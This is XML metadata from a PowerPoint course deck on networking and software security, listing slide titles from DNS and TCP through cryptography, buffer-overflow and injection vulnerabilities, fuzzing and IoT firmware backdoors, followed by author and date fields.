      <vt:lpstr>Routing from A-Z: DNS</vt:lpstr>
      <vt:lpstr>DNS Root Servers</vt:lpstr>
      <vt:lpstr>Routing from A-Z: Domains</vt:lpstr>
      <vt:lpstr>Routing from A-Z: DNS</vt:lpstr>
      <vt:lpstr>Routing from A-Z: DNS data</vt:lpstr>
      <vt:lpstr>Routing from A-Z: DNS message</vt:lpstr>
      <vt:lpstr>Local mapping</vt:lpstr>
      <vt:lpstr>Get a DHCP lease</vt:lpstr>
      <vt:lpstr>Local Address resolution (ARP)</vt:lpstr>
      <vt:lpstr>Hop-by-Hop Packet Forwarding</vt:lpstr>
      <vt:lpstr>What reaching the local end hosts?</vt:lpstr>
      <vt:lpstr>Routing from A-Z: IP packets</vt:lpstr>
      <vt:lpstr>Routing from A-Z: Allocating addresses</vt:lpstr>
      <vt:lpstr>Obtaining a Block of Addresses</vt:lpstr>
      <vt:lpstr>Figuring Out Who Owns an Address</vt:lpstr>
      <vt:lpstr>Transport Protocols</vt:lpstr>
      <vt:lpstr>UDP: Unreliable Message Delivery Service</vt:lpstr>
      <vt:lpstr>Multiplexing and Demultiplexing</vt:lpstr>
      <vt:lpstr>Transmission Control Protocol (TCP)</vt:lpstr>
      <vt:lpstr>Routing Information Protocol (RIP)</vt:lpstr>
      <vt:lpstr>Linux networking commands</vt:lpstr>
      <vt:lpstr>Linux networking commands</vt:lpstr>
      <vt:lpstr>Isolation and sandboxing</vt:lpstr>
      <vt:lpstr>Provisioning and configuration</vt:lpstr>
      <vt:lpstr>Collecting data: packet sniffing</vt:lpstr>
      <vt:lpstr>Network segmentation</vt:lpstr>
      <vt:lpstr>Software defined networks</vt:lpstr>
      <vt:lpstr>Software and networking part 4, security</vt:lpstr>
      <vt:lpstr>Security</vt:lpstr>
      <vt:lpstr>Security and cryptography</vt:lpstr>
      <vt:lpstr>The wiretap channel: “In the beginning”</vt:lpstr>
      <vt:lpstr>Adversaries and their discontents</vt:lpstr>
      <vt:lpstr>Cryptographic toolchest</vt:lpstr>
      <vt:lpstr>Symmetric ciphers</vt:lpstr>
      <vt:lpstr>Asymmetric (Public Key) ciphers</vt:lpstr>
      <vt:lpstr>Cryptographic hashes, random numbers</vt:lpstr>
      <vt:lpstr>Computational strength of adversary</vt:lpstr>
      <vt:lpstr>Information strength of the adversary</vt:lpstr>
      <vt:lpstr>Trusted computing</vt:lpstr>
      <vt:lpstr>Building a secure distributed application</vt:lpstr>
      <vt:lpstr>Secret sauce: the “Tao”</vt:lpstr>
      <vt:lpstr>Measurement-based Principals</vt:lpstr>
      <vt:lpstr>Policy anchor</vt:lpstr>
      <vt:lpstr>Key management</vt:lpstr>
      <vt:lpstr>CloudProxy Tao Library</vt:lpstr>
      <vt:lpstr>Turtles all the way down</vt:lpstr>
      <vt:lpstr>Cloud setting: protection model</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>A Trusted OS</vt:lpstr>
      <vt:lpstr>What’s next</vt:lpstr>
      <vt:lpstr>Software and networking part 5, program creation and vulnerabilities</vt:lpstr>
      <vt:lpstr>Software security: program creation</vt:lpstr>
      <vt:lpstr>Development tools</vt:lpstr>
      <vt:lpstr>Development tools</vt:lpstr>
      <vt:lpstr>Software and networking part 6, control hijacking vulnerabilities</vt:lpstr>
      <vt:lpstr>The dark side of program creation: bugs, exploits and vulnerabilities</vt:lpstr>
      <vt:lpstr>Updating concepts</vt:lpstr>
      <vt:lpstr>Anatomy of an update package</vt:lpstr>
      <vt:lpstr>Darker still: Hardware vulnerabilities</vt:lpstr>
      <vt:lpstr>Code vulnerabilities generally</vt:lpstr>
      <vt:lpstr>Kernel vulnerabilities</vt:lpstr>
      <vt:lpstr>Another kernel vulnerability</vt:lpstr>
      <vt:lpstr>Other vulnerabilities</vt:lpstr>
      <vt:lpstr>Protocol vulnerabilities</vt:lpstr>
      <vt:lpstr>Linux process memory layout</vt:lpstr>
      <vt:lpstr>Stack frames and calling conventions</vt:lpstr>
      <vt:lpstr>Stack frames and calling conventions</vt:lpstr>
      <vt:lpstr>Stack frames and calling conventions (Intel)</vt:lpstr>
      <vt:lpstr>Stack buffer example</vt:lpstr>
      <vt:lpstr>Effectuating hijacking through nop slide</vt:lpstr>
      <vt:lpstr>Example buffer overflow target</vt:lpstr>
      <vt:lpstr>Example buffer overflow target</vt:lpstr>
      <vt:lpstr>Example buffer overflow target</vt:lpstr>
      <vt:lpstr>Stack when it starts executing</vt:lpstr>
      <vt:lpstr>Assembly code for function</vt:lpstr>
      <vt:lpstr>Assembly code for function</vt:lpstr>
      <vt:lpstr>Buffer overflow: technical details</vt:lpstr>
      <vt:lpstr>Buffer overflow: technical details</vt:lpstr>
      <vt:lpstr>Heap-based control hijacking</vt:lpstr>
      <vt:lpstr>Attack: return to libc</vt:lpstr>
      <vt:lpstr>ROP Attacks</vt:lpstr>
      <vt:lpstr>Other types of overflow attacks</vt:lpstr>
      <vt:lpstr>Double free</vt:lpstr>
      <vt:lpstr>Heap exploitation</vt:lpstr>
      <vt:lpstr>Heap exploit after double free</vt:lpstr>
      <vt:lpstr>Heap exploit after double free</vt:lpstr>
      <vt:lpstr>Know your programming language</vt:lpstr>
      <vt:lpstr>Software and networking part 7, other vulnerabilities</vt:lpstr>
      <vt:lpstr>Timing vulnerabilities</vt:lpstr>
      <vt:lpstr>The timing example</vt:lpstr>
      <vt:lpstr>Configuration vulnerabilities</vt:lpstr>
      <vt:lpstr>Storage vulnerabilities</vt:lpstr>
      <vt:lpstr>Authentication and authorization vulnerabilities</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>TOCTOU attacks</vt:lpstr>
      <vt:lpstr>Resource exhaustion vulnerabilities</vt:lpstr>
      <vt:lpstr>User as vulnerability</vt:lpstr>
      <vt:lpstr>Web Vulnerabilities</vt:lpstr>
      <vt:lpstr>Update vulnerabilities</vt:lpstr>
      <vt:lpstr>Code you never see</vt:lpstr>
      <vt:lpstr>Some attacks are forever</vt:lpstr>
      <vt:lpstr>Supply chain vulnerabilities</vt:lpstr>
      <vt:lpstr>Software and networking part 8, attacking and hardening software </vt:lpstr>
      <vt:lpstr>Defenses</vt:lpstr>
      <vt:lpstr>Fuzzing: libfuzz setup with llvm</vt:lpstr>
      <vt:lpstr>Simple libfuzz example</vt:lpstr>
      <vt:lpstr>Redundancy and failure</vt:lpstr>
      <vt:lpstr>Formal methods</vt:lpstr>
      <vt:lpstr>Red Teaming</vt:lpstr>
      <vt:lpstr>Software and networking part 9, IoT software and attacks</vt:lpstr>
      <vt:lpstr>What’s special about IoT</vt:lpstr>
      <vt:lpstr>Large, public IoT attacks</vt:lpstr>
      <vt:lpstr>IoT specific protocols</vt:lpstr>
      <vt:lpstr>Trusted computing primitives for IoT</vt:lpstr>
      <vt:lpstr>Dice/Riot (Microsoft)</vt:lpstr>
      <vt:lpstr>Hardware/software boundaries</vt:lpstr>
      <vt:lpstr>Spectre</vt:lpstr>
      <vt:lpstr>Rowhammer</vt:lpstr>
      <vt:lpstr>Reverse engineering information and tools</vt:lpstr>
      <vt:lpstr>Firmware modification kit tools</vt:lpstr>
      <vt:lpstr>Firmware modification kit tools</vt:lpstr>
      <vt:lpstr>Simulating and reverse engineering software</vt:lpstr>
      <vt:lpstr>Reverse engineering</vt:lpstr>
      <vt:lpstr>Firmware mod kit</vt:lpstr>
      <vt:lpstr>Develop a backdoor</vt:lpstr>
      <vt:lpstr>Building backdoor</vt:lpstr>
      <vt:lpstr>Building backdoor</vt:lpstr>
      <vt:lpstr>Building backdoor</vt:lpstr>
      <vt:lpstr>Finding command injection attacks</vt:lpstr>
      <vt:lpstr>Finding command injection attacks</vt:lpstr>
      <vt:lpstr>Finding command injection attacks</vt:lpstr>
      <vt:lpstr>Preventing command injection attacks</vt:lpstr>
      <vt:lpstr>Some practical stuff</vt:lpstr>
      <vt:lpstr>More IoT development tools</vt:lpstr>
      <vt:lpstr>More exercises</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>License</vt:lpstr>
      <vt:lpstr>HTTP protocol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John Manferdelli</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>John Manferdelli</cp:lastModifiedBy>
  <cp:revision>1406</cp:revision>
  <cp:lastPrinted>2019-08-22T23:06:04Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-02-22T19:21:19Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-06T19:55:53Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>